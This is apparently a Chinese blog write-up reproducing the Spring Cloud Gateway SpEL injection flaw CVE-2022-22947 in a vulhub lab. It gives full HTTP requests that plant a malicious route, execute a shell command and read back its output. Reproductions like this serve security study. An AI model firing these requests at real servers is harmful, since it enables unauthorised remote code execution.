漏洞复现-CVE-2022-22947-Spring Cloud Gateway RCE

0x00 实验环境

攻击机:Ubuntu

靶场:vulhub搭建的靶场环境

 

0x01 影响版本


3.1.0
3.0.03.0.6
旧的不受支持的版本也受影响,是Spring Cloud Gateway的一个SpEL命令注入漏洞

 

0x02 漏洞复现

(1)访问页面,默认路径gateway在页面actuator可访问,如下图所示:

 

 

(2)http://x.x.x.x:8080/actuator/gateway

 

使用如下payload:

POST /actuator/gateway/routes/hacktest HTTP/1.1
Host:x.x.x.x:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 329

{
  "id": "hacktest",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"
    }
  }],
  "uri": "http://example.com"
}

 

 

 201代表创建成功

(3)访问url后修改为post请求即可触发该payload:

POST /actuator/gateway/refresh HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

 

 (4)然后访问以下链接即可回显命令执行的结果:

http://x.x.x.x:8080/actuator/gateway/routes/hacktest

 

 (5)写入内存马的方式:将如下文件编译成class文件后再编码为base64格式,替换“id”命令:https://mp.weixin.qq.com/s/2wKB3jACAkIiIZ96tVb5fA,具体参考这篇文章:

 内部poc可以写入成功(poc暂时不对外公布):

 

 (6)反弹shell的暂时还没成功。

0x03 漏洞原理

https://www.jianshu.com/p/5a3dfdc4be8b

 

0x04 参考文献

https://www.jianshu.com/p/5a3dfdc4be8b

 

0x05 免责声明

本漏洞复现文章仅用于学习、工作与兴趣爱好,并立志为网络安全奉献一份力量,凡是利用本博客相关内容的无良hackers造成的安全事故均与本人无关!

posted @ 2022-05-30 00:03  铺哩  阅读(780)  评论(0编辑  收藏  举报